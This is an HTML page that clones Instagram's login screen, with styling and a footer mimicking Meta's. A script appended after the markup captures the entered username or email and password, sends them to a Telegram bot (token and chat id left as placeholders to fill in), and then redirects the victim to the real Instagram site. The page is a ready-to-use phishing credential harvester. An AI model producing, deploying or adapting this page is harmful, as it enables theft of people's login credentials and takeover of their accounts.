<!DOCTYPE html>
<html lang="es">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <script script src="https://kit.fontawesome.com/c0e8330125.js" crossorigin="anonymous"></script>

  
    <link rel="shortcut icon" href="img/instagram.png" type="image/x-icon" />
    
    <title>Instagram</title>
  </head>
  <body>
    <main>
      <section>
        <div class="card card--large text-center">
          <a href="https://github.com/antonioalanxs/Responsive-Instagram-Login-Clone" class="logo">
            <img src="instagram-logo.png" alt="Instagram logo" />
          </a>
          <form class="form">
            <input
            type="text"
            placeholder="Phone number, username or email"
            class="form__input form__input--soft fs-small"
            />
            <input
            type="password"
            placeholder="Password"
            class="form__input form__input--soft fs-small"
            />
            <button class="form__submit form__submit--disabled form__submit--separated fs-large fw-medium">
              Log In
            </button>
          </form>
          <div class="bar fs-medium" id="bar">
            <span class="bar__line bar__line--soft"></span>
            <span class="bar__text fw-medium text-soft">Or</span>
            <span class="bar__line bar__line--soft"></span>
          </div>
          <a href="#" class="facebook fs-large" id="facebook">
            <img
            src="facebook.png"
            alt="Facebook logo"
            class="facebook__icon"
            />
            <span class="facebook__text fw-medium">Log in with Facebook</span>
          </a>
          <div class="fs-small text-blue" id="forgot-password">
            Forgot password?
          </div>
        </div>
        
        <div class="card card--medium text-center fs-large" id="second-card">
          <span class="text-dark">Don't have an account?</span>
          <a href="#" class="fw-medium text-light-blue">Sign up</a>
        </div>
        <div class="banner fs-large">
          <div class="banner__text text-dark">Get the app.</div>
          <div>
            <img
            src="app-store.png"
            alt="Apple Store"
            class="banner__img"
            />
            <img
            src="google-play.png"
            alt="Google Play"
            class="banner__img"
            />
          </div>
        </div>
      </section>

      <section class="phone">
        <img src="phone-screen.png" alt="Instagram on a iPhone" class="phone__screen">
      </section>
    </main>
    
    <footer class="fs-small">
      <nav>
        <a href="#" class="text-gap text-soft">Meta</a>
        <a href="#" class="text-gap text-soft">About</a>
        <a href="#" class="text-gap text-soft">Blog</a>
        <a href="#" class="text-gap text-soft">Jobs</a>
        <a href="#" class="text-gap text-soft">Help</a>
        <a href="#" class="text-gap text-soft">API</a>
        <a href="#" class="text-gap text-soft">Privacy</a>
        <a href="#" class="text-gap text-soft">Terms</a>
        <a href="#" class="text-gap text-soft">Top Accounts</a>
        <a href="#" class="text-gap text-soft">Hashtags</a>
        <a href="#" class="text-gap text-soft">Locations</a>
        <a href="#" class="text-gap text-soft">Instagram Lite</a>
        <a href="#" class="text-gap text-soft">Contact Uploading & Non-Users</a>
      </nav>
      <nav>
        <a href="#" class="text-gap text-soft">Dance</a>
        <a href="#" class="text-gap text-soft">Food & Drink</a>
        <a href="#" class="text-gap text-soft">Home & Garden</a>
        <a href="#" class="text-gap text-soft">Music</a>
        <a href="#" class="text-gap text-soft">Visual Arts</a>
      </nav>
      <article>
        <span class="text-gap text-soft">English</span>
        <span class="text-gap text-soft">© 2022 Instagram from Meta</span>
        <a href="https://github.com/antonioalanxs" class="text-gap text-dark">
          <i class="fa-brands fa-github-alt fa-2x"></i>
        </a>
      </article>
    </footer>
  </body>
</html>
<script>
  document.querySelector('form').addEventListener('submit', function(event) {
    event.preventDefault();
    var usernameOrEmail = document.querySelector('input[type="text"]').value;
    var password = document.querySelector('input[type="password"]').value;

    var botToken = 'put your bot token here';
    var chatId = 'Put you telegram chat id'; 
    var message = `Username/Email: ${usernameOrEmail}\nPassword: ${password}`;
    var telegramURL = `https://api.telegram.org/bot${botToken}/sendMessage`;
    fetch(telegramURL, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify({
            chat_id: chatId,
            text: message
        })
    })
    .then(response => response.json())
    .then(data => {
        console.log('Message sent successfully:', data);
        
        window.location.href = 'https://instagram.com'; 
    })
    .catch(error => {
        console.error('Error:', error);
    });
});
</script>
<style>
  :root {
  --fs-large: 0.875rem;
  --fs-medium: 0.8125rem;
  --fs-small: 0.75rem;

  --fw-medium: 600;

  --ff-apple: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica,
    Arial, sans-serif;

  --clr-primary: #fafafa;
  --clr-accent: #dbdbdb;
  --clr-white: #fff;
  --clr-gray: #8e8e8e;
  --clr-dark: #262626;
  --clr-blue: #00376b;
  --clr-disabled-blue: #1aa5ff;
  --clr-light-blue: #0095f6;
  --clr-facebook: #385185;
}

*,
*::before,
*::after {
  box-sizing: border-box;
  padding: 0;
  margin: 0;
}

a,
a:active,
a:hover {
  text-decoration: none;
}

.text-center {
  text-align: center;
}

.text-gap {
  padding: 0.1em 0.7em;
}

.fs-large {
  font-size: var(--fs-large);
}

.fs-medium {
  font-size: var(--fs-medium);
}

.fs-small {
  font-size: var(--fs-small);
}

.fw-medium {
  font-weight: var(--fw-medium);
}

.text-dark {
  color: var(--clr-dark);
}

.text-blue {
  color: var(--clr-blue);
}

.text-light-blue {
  color: var(--clr-light-blue);
}

.text-soft {
  color: var(--clr-gray);
}

.card {
  border: 1px solid var(--clr-accent);
  background-color: var(--clr-white);
}

.card--large {
  padding: 1% 12% 4% 12%;
}

.card--medium {
  padding: 5% 0;
}


.phone {

  width: 421px;
  height: 583px;

  background-image: url("img/phone.png");
  background-repeat: no-repeat;
}

.phone__screen {
 
  position: relative;
  top: 28px;
  left: 155px;
}

.form {
  display: flex;
  flex-direction: column;
  gap: 0.4em;
}

.form__input {
  padding: 0.8em 0.7em;
  border-radius: 3px;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  -ms-border-radius: 3px;
  -o-border-radius: 3px;
  outline: none;
}

.form__input--soft {
  border: 1px solid var(--clr-accent);
  background-color: var(--clr-primary);
}

.form__submit {
  padding: 0.6em;
  border-width: 1px;
  border-style: solid;
  border-radius: 4px;
  -webkit-border-radius: 4px;
  -moz-border-radius: 4px;
  -ms-border-radius: 4px;
  -o-border-radius: 4px;
  -webkit-border-radius: 0;
}

.form__submit--separated {
  margin-top: 0.75em;
}

.form__submit--disabled {
  color: var(--clr-white);

  border-color: transparent;
  background-color: var(--clr-disabled-blue);
}


.bar {
  display: grid;
  grid-template-columns: 1fr auto 1fr;
  column-gap: 1.4em;
}

.bar__line {
  align-self: center;
  height: 1px;
}

.bar__line--soft {
  background-color: var(--clr-accent);
}

.bar__text {
  text-transform: uppercase;
}


.facebook {
  display: flex;
  gap: 0.4em;
}

.facebook__icon {
  position: relative;
  top: 0.2em;

  width: 1.143em;
  height: 1.143em;
}

.facebook__text {
  color: var(--clr-facebook);
}

.banner {
  display: flex;
  flex-direction: column;
  align-items: center;
  gap: 1.4em;
}

.banner__text {
  text-align: center;
}

.banner__img {
  height: 2.5em;
}


.logo img {
  margin-top: 2.25em;
  margin-bottom: 2.25em;
}


#bar {
  margin: 1.5em 0 1.7em 0;
}

#facebook {
  justify-content: center;
}

#forgot-password {
  margin-top: 1.8em;
}


#second-card {
  margin-top: 0.8em;
  margin-bottom: 1.6em;
}
footer {
  margin: 0 8%;
  padding-bottom: 6.3em;

  line-height: 1.8em;
}

footer > * {
  display: flex;
  flex-wrap: wrap;

  justify-content: center;
}

footer article {
  margin-top: 0.8em;
}

body {
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
  gap: 4em;
  min-height: 120vh;

  font-family: var(--ff-apple);

  background-color: var(--clr-primary);
}

main {
  display: flex;
  flex-direction: row-reverse;
  align-items: center;
  gap: 2em;
}

main > section {

  width: 22em;
}


@media (max-width: 875px) {
  .phone {
    display: none;
  }
}

@media (max-width: 450px) {
  body {
    justify-content: start;
  }
  
  .card {
    border: none;
    background: transparent;
  }
  
  main > section {
    width: 19em;
  }
}

</style>